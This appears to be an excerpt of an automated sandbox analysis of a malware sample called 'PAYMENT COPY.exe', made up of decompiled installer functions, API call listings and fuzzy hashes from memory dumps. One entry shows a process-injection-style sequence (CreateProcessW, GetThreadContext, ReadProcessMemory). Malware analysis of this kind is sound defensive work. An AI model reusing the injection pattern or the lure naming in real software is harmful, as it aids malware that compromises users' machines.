                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                  • API String ID: 1716503409-3657065657
                                                                  • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                  • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                  • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                  • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02640355
                                                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 02640378
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0264039C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341529423.0000000002640000.00000040.00000001.sdmp, Offset: 02640000, based on PE: false
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThread
                                                                  • String ID:
                                                                  • API String ID: 2411489757-0
                                                                  • Opcode ID: 9d6b4ad5fc41cc2282ea995e660bd7c9d1b241f2027759a22caedd7a6c70497e
                                                                  • Instruction ID: 12cdf54f39f7f26bbc6fb6a974c5780315b063bf2d46e59972ef9c0e543747b4
                                                                  • Opcode Fuzzy Hash: 9d6b4ad5fc41cc2282ea995e660bd7c9d1b241f2027759a22caedd7a6c70497e
                                                                  • Instruction Fuzzy Hash: D602E271D00229EFEB18DF94C985BEDBBB5EF48309F204099E655BA290DB749A81CF14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 73%
                                                                  			E0040136D(signed int _a4) {
                                                                  				intOrPtr* _t8;
                                                                  				int _t10;
                                                                  				signed int _t12;
                                                                  				int _t13;
                                                                  				int _t14;
                                                                  				signed int _t21;
                                                                  				int _t24;
                                                                  				signed int _t27;
                                                                  				void* _t28;
                                                                  
                                                                  				_t27 = _a4;
                                                                  				while(_t27 >= 0) {
                                                                  					_t8 = _t27 * 0x1c +  *0x7a2fb0;
                                                                  					__eflags =  *_t8 - 1;
                                                                  					if( *_t8 == 1) {
                                                                  						break;
                                                                  					}
                                                                  					_push(_t8); // executed
                                                                  					_t10 = E00401439(); // executed
                                                                  					__eflags = _t10 - 0x7fffffff;
                                                                  					if(_t10 == 0x7fffffff) {
                                                                  						return 0x7fffffff;
                                                                  					}
                                                                  					__eflags = _t10;
                                                                  					if(__eflags < 0) {
                                                                  						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
                                                                  						__eflags = _t10;
                                                                  					}
                                                                  					if(__eflags != 0) {
                                                                  						_t12 = _t10 - 1;
                                                                  						_t21 = _t27;
                                                                  						_t27 = _t12;
                                                                  						_t13 = _t12 - _t21;
                                                                  						__eflags = _t13;
                                                                  					} else {
                                                                  						_t13 = 1;
                                                                  						_t27 = _t27 + 1;
                                                                  					}
                                                                  					__eflags =  *(_t28 + 0xc);
                                                                  					if( *(_t28 + 0xc) != 0) {
                                                                  						 *0x7a276c =  *0x7a276c + _t13;
                                                                  						_t14 =  *0x7a2754;
                                                                  						__eflags = _t14;
                                                                  						_t24 = (0 | _t14 == 0x00000000) + _t14;
                                                                  						__eflags = _t24;
                                                                  						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
                                                                  					}
                                                                  				}
                                                                  				return 0;
                                                                  			}












                                                                  0x0040136e
                                                                  0x004013fb
                                                                  0x00401382
                                                                  0x00401384
                                                                  0x00401387
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401389
                                                                  0x0040138a
                                                                  0x0040138f
                                                                  0x00401394
                                                                  0x00000000
                                                                  0x00401409
                                                                  0x00401396
                                                                  0x00401398
                                                                  0x004013a6
                                                                  0x004013ab
                                                                  0x004013ab
                                                                  0x004013ad
                                                                  0x004013b5
                                                                  0x004013b6
                                                                  0x004013b8
                                                                  0x004013ba
                                                                  0x004013ba
                                                                  0x004013af
                                                                  0x004013b1
                                                                  0x004013b2
                                                                  0x004013b2
                                                                  0x004013bc
                                                                  0x004013c1
                                                                  0x004013c3
                                                                  0x004013c9
                                                                  0x004013d2
                                                                  0x004013d7
                                                                  0x004013d7
                                                                  0x004013f5
                                                                  0x004013f5
                                                                  0x004013c1
                                                                  0x00000000

                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                  • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: 4@
                                                                  • API String ID: 3850602802-2385517874
                                                                  • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                  • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                                                  • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                  • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 84%
                                                                  			E00403116(void* __eflags) {
                                                                  				void* _t2;
                                                                  				void* _t5;
                                                                  				CHAR* _t6;
                                                                  
                                                                  				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                  				E00405BFB(_t6);
                                                                  				_t2 = E00405538(_t6);
                                                                  				if(_t2 != 0) {
                                                                  					E004054CC(_t6);
                                                                  					CreateDirectoryA(_t6, 0); // executed
                                                                  					_t5 = E004056BF("\"C:\\Users\\engineer\\Desktop\\PAYMENT COPY.exe\" ", _t6); // executed
                                                                  					return _t5;
                                                                  				} else {
                                                                  					return _t2;
                                                                  				}
                                                                  			}






                                                                  0x00403117
                                                                  0x0040311d
                                                                  0x00403123
                                                                  0x0040312a
                                                                  0x0040312f
                                                                  0x00403137
                                                                  0x00403143
                                                                  0x00403149
                                                                  0x0040312d
                                                                  0x0040312d
                                                                  0x0040312d

                                                                  APIs
                                                                    • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                    • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                    • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                    • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                  • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                  • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 4115351271-458791393
                                                                  • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                  • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                                                  • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                  • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E00405690(CHAR* _a4, long _a8, long _a12) {
                                                                  				signed int _t5;
                                                                  				void* _t6;
                                                                  
                                                                  				_t5 = GetFileAttributesA(_a4); // executed
                                                                  				asm("sbb ecx, ecx");
                                                                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                  				return _t6;
                                                                  			}





                                                                  0x00405694
                                                                  0x004056a1
                                                                  0x004056b6
                                                                  0x004056bc

                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                  • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                                  • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                  • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004030CD(void* _a4, long _a8) {
                                                                  				int _t6;
                                                                  				long _t10;
                                                                  
                                                                  				_t10 = _a8;
                                                                  				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
                                                                  				if(_t6 == 0 || _a8 != _t10) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					return 1;
                                                                  				}
                                                                  			}





                                                                  0x004030d1
                                                                  0x004030e4
                                                                  0x004030ec
                                                                  0x00000000
                                                                  0x004030f3
                                                                  0x00000000
                                                                  0x004030f5

                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                  • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                                                  • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                  • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004030FF(long _a4) {
                                                                  				long _t2;
                                                                  
                                                                  				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                                                                  				return _t2;
                                                                  			}




                                                                  0x0040310d
                                                                  0x00403113

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                  • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                  • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                  • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  C-Code - Quality: 89%
                                                                  			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
                                                                  				struct HWND__* _v8;
                                                                  				struct tagRECT _v24;
                                                                  				void* _v32;
                                                                  				signed int _v36;
                                                                  				int _v40;
                                                                  				CHAR* _v44;
                                                                  				signed int _v48;
                                                                  				int _v52;
                                                                  				void* _v56;
                                                                  				void* _v64;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				long _t86;
                                                                  				struct HMENU__* _t88;
                                                                  				unsigned int _t91;
                                                                  				int _t93;
                                                                  				int _t94;
                                                                  				void* _t100;
                                                                  				intOrPtr _t123;
                                                                  				struct HWND__* _t127;
                                                                  				int _t148;
                                                                  				int _t149;
                                                                  				struct HWND__* _t153;
                                                                  				struct HWND__* _t157;
                                                                  				struct HMENU__* _t159;
                                                                  				long _t161;
                                                                  				CHAR* _t162;
                                                                  				CHAR* _t163;
                                                                  
                                                                  				_t153 =  *0x7a2764;
                                                                  				_t148 = 0;
                                                                  				_v8 = _t153;
                                                                  				if(_a8 != 0x110) {
                                                                  					if(_a8 == 0x405) {
                                                                  						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
                                                                  					}
                                                                  					if(_a8 != 0x111) {
                                                                  						L16:
                                                                  						if(_a8 != 0x404) {
                                                                  							L24:
                                                                  							if(_a8 != 0x7b || _a12 != _t153) {
                                                                  								goto L19;
                                                                  							} else {
                                                                  								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
                                                                  								_a8 = _t86;
                                                                  								if(_t86 <= _t148) {
                                                                  									L36:
                                                                  									return 0;
                                                                  								}
                                                                  								_t88 = CreatePopupMenu();
                                                                  								_push(0xffffffe1);
                                                                  								_push(_t148);
                                                                  								_t159 = _t88;
                                                                  								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
                                                                  								_t91 = _a16;
                                                                  								if(_t91 != 0xffffffff) {
                                                                  									_t149 = _t91;
                                                                  									_t93 = _t91 >> 0x10;
                                                                  								} else {
                                                                  									GetWindowRect(_t153,  &_v24);
                                                                  									_t149 = _v24.left;
                                                                  									_t93 = _v24.top;
                                                                  								}
                                                                  								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
                                                                  								_t161 = 1;
                                                                  								if(_t94 == 1) {
                                                                  									_v56 = _t148;
                                                                  									_v44 = 0x79f580;
                                                                  									_v40 = 0xfff;
                                                                  									_a4 = _a8;
                                                                  									do {
                                                                  										_a4 = _a4 - 1;
                                                                  										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                                  									} while (_a4 != _t148);
                                                                  									OpenClipboard(_t148);
                                                                  									EmptyClipboard();
                                                                  									_t100 = GlobalAlloc(0x42, _t161);
                                                                  									_a4 = _t100;
                                                                  									_t162 = GlobalLock(_t100);
                                                                  									do {
                                                                  										_v44 = _t162;
                                                                  										SendMessageA(_v8, 0x102d, _t148,  &_v64);
                                                                  										_t163 =  &(_t162[lstrlenA(_t162)]);
                                                                  										 *_t163 = 0xa0d;
                                                                  										_t162 =  &(_t163[2]);
                                                                  										_t148 = _t148 + 1;
                                                                  									} while (_t148 < _a8);
                                                                  									GlobalUnlock(_a4);
                                                                  									SetClipboardData(1, _a4);
                                                                  									CloseClipboard();
                                                                  								}
                                                                  								goto L36;
                                                                  							}
                                                                  						}
                                                                  						if( *0x7a274c == _t148) {
                                                                  							ShowWindow( *0x7a2f84, 8);
                                                                  							if( *0x7a300c == _t148) {
                                                                  								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
                                                                  							}
                                                                  							E00403D80(1);
                                                                  							goto L24;
                                                                  						}
                                                                  						 *0x79e950 = 2;
                                                                  						E00403D80(0x78);
                                                                  						goto L19;
                                                                  					} else {
                                                                  						if(_a12 != 0x403) {
                                                                  							L19:
                                                                  							return E00403E0E(_a8, _a12, _a16);
                                                                  						}
                                                                  						ShowWindow( *0x7a2750, _t148);
                                                                  						ShowWindow(_t153, 8);
                                                                  						E0040417A();
                                                                  						goto L16;
                                                                  					}
                                                                  				}
                                                                  				_v48 = _v48 | 0xffffffff;
                                                                  				_v36 = _v36 | 0xffffffff;
                                                                  				_v56 = 2;
                                                                  				_v52 = 0;
                                                                  				_v44 = 0;
                                                                  				_v40 = 0;
                                                                  				asm("stosd");
                                                                  				asm("stosd");
                                                                  				_t123 =  *0x7a2f88;
                                                                  				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                  				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                  				 *0x7a2750 = GetDlgItem(_a4, 0x403);
                                                                  				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
                                                                  				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                  				 *0x7a2764 = _t127;
                                                                  				_v8 = _t127;
                                                                  				E00403DDC( *0x7a2750);
                                                                  				 *0x7a2754 = E004045FA(4);
                                                                  				 *0x7a276c = 0;
                                                                  				GetClientRect(_v8,  &_v24);
                                                                  				_v48 = _v24.right - GetSystemMetrics(0x15);
                                                                  				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                  				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                  				if(_a8 >= 0) {
                                                                  					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                  					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                  				}
                                                                  				if(_a12 >= _t148) {
                                                                  					SendMessageA(_v8, 0x1024, _t148, _a12);
                                                                  				}
                                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                  				_push(0x1b);
                                                                  				E00403DA7(_a4);
                                                                  				if(( *0x7a2f90 & 0x00000003) != 0) {
                                                                  					ShowWindow( *0x7a2750, _t148);
                                                                  					if(( *0x7a2f90 & 0x00000002) != 0) {
                                                                  						 *0x7a2750 = _t148;
                                                                  					} else {
                                                                  						ShowWindow(_v8, 8);
                                                                  					}
                                                                  				}
                                                                  				_t157 = GetDlgItem(_a4, 0x3ec);
                                                                  				SendMessageA(_t157, 0x401, _t148, 0x75300000);
                                                                  				if(( *0x7a2f90 & 0x00000004) != 0) {
                                                                  					SendMessageA(_t157, 0x409, _t148, _a12);
                                                                  					SendMessageA(_t157, 0x2001, _t148, _a8);
                                                                  				}
                                                                  				goto L36;
                                                                  			}
































                                                                  0x00404ea9
                                                                  0x00404eaf
                                                                  0x00404eb8
                                                                  0x00404ebb
                                                                  0x00405048
                                                                  0x0040506c
                                                                  0x0040506c
                                                                  0x0040507f
                                                                  0x0040509c
                                                                  0x004050a3
                                                                  0x004050fa
                                                                  0x004050fe
                                                                  0x00000000
                                                                  0x00405105
                                                                  0x0040510d
                                                                  0x00405115
                                                                  0x00405118
                                                                  0x00405215
                                                                  0x00000000
                                                                  0x00405215
                                                                  0x0040511e
                                                                  0x00405124
                                                                  0x00405126
                                                                  0x00405127
                                                                  0x00405133
                                                                  0x00405139
                                                                  0x0040513f
                                                                  0x00405154
                                                                  0x0040515a
                                                                  0x00405141
                                                                  0x00405146
                                                                  0x0040514c
                                                                  0x0040514f
                                                                  0x0040514f
                                                                  0x00405168
                                                                  0x00405170
                                                                  0x00405173
                                                                  0x0040517c
                                                                  0x0040517f
                                                                  0x00405186
                                                                  0x0040518d
                                                                  0x00405195
                                                                  0x00405195
                                                                  0x004051ac
                                                                  0x004051ac
                                                                  0x004051b3
                                                                  0x004051b9
                                                                  0x004051c2
                                                                  0x004051c9
                                                                  0x004051d2
                                                                  0x004051d4
                                                                  0x004051d7
                                                                  0x004051e0
                                                                  0x004051ec
                                                                  0x004051ee
                                                                  0x004051f4
                                                                  0x004051f5
                                                                  0x004051f6
                                                                  0x004051fe
                                                                  0x00405209
                                                                  0x0040520f
                                                                  0x0040520f
                                                                  0x00000000
                                                                  0x00405173
                                                                  0x004050fe
                                                                  0x004050ab
                                                                  0x004050db
                                                                  0x004050e3
                                                                  0x004050ee
                                                                  0x004050ee
                                                                  0x004050f5
                                                                  0x00000000
                                                                  0x004050f5
                                                                  0x004050af
                                                                  0x004050b9
                                                                  0x00000000
                                                                  0x00405081
                                                                  0x00405087
                                                                  0x004050be
                                                                  0x00000000
                                                                  0x004050c7
                                                                  0x00405090
                                                                  0x00405095
                                                                  0x00405097
                                                                  0x00000000
                                                                  0x00405097
                                                                  0x0040507f
                                                                  0x00404ec1
                                                                  0x00404ec5
                                                                  0x00404ece
                                                                  0x00404ed5
                                                                  0x00404ed8
                                                                  0x00404edb
                                                                  0x00404ede
                                                                  0x00404edf
                                                                  0x00404ee0
                                                                  0x00404ef9
                                                                  0x00404efc
                                                                  0x00404f06
                                                                  0x00404f15
                                                                  0x00404f1d
                                                                  0x00404f25
                                                                  0x00404f2a
                                                                  0x00404f2d
                                                                  0x00404f39
                                                                  0x00404f42
                                                                  0x00404f4b
                                                                  0x00404f6e
                                                                  0x00404f74
                                                                  0x00404f85
                                                                  0x00404f8a
                                                                  0x00404f98
                                                                  0x00404fa6
                                                                  0x00404fa6
                                                                  0x00404fab
                                                                  0x00404fb9
                                                                  0x00404fb9
                                                                  0x00404fbe
                                                                  0x00404fc1
                                                                  0x00404fc6
                                                                  0x00404fd2
                                                                  0x00404fdb
                                                                  0x00404fe8
                                                                  0x00404ff7
                                                                  0x00404fea
                                                                  0x00404fef
                                                                  0x00404fef
                                                                  0x00404fe8
                                                                  0x0040500c
                                                                  0x00405015
                                                                  0x0040501e
                                                                  0x0040502e
                                                                  0x0040503a
                                                                  0x0040503a
                                                                  0x00000000

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00404EFF
                                                                  • GetDlgItem.USER32 ref: 00404F0E
                                                                  • GetDlgItem.USER32 ref: 00404F1D
                                                                    • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                  • GetClientRect.USER32 ref: 00404F4B
                                                                  • GetSystemMetrics.USER32 ref: 00404F53
                                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                  • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                  • GetDlgItem.USER32 ref: 00405005
                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                  • GetDlgItem.USER32 ref: 00405057
                                                                  • CreateThread.KERNEL32 ref: 00405065
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                  • ShowWindow.USER32(00000000), ref: 00405090
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                  • ShowWindow.USER32(00000008), ref: 004050DB
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                  • CreatePopupMenu.USER32 ref: 0040511E
                                                                  • AppendMenuA.USER32 ref: 00405133
                                                                  • GetWindowRect.USER32 ref: 00405146
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                  • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
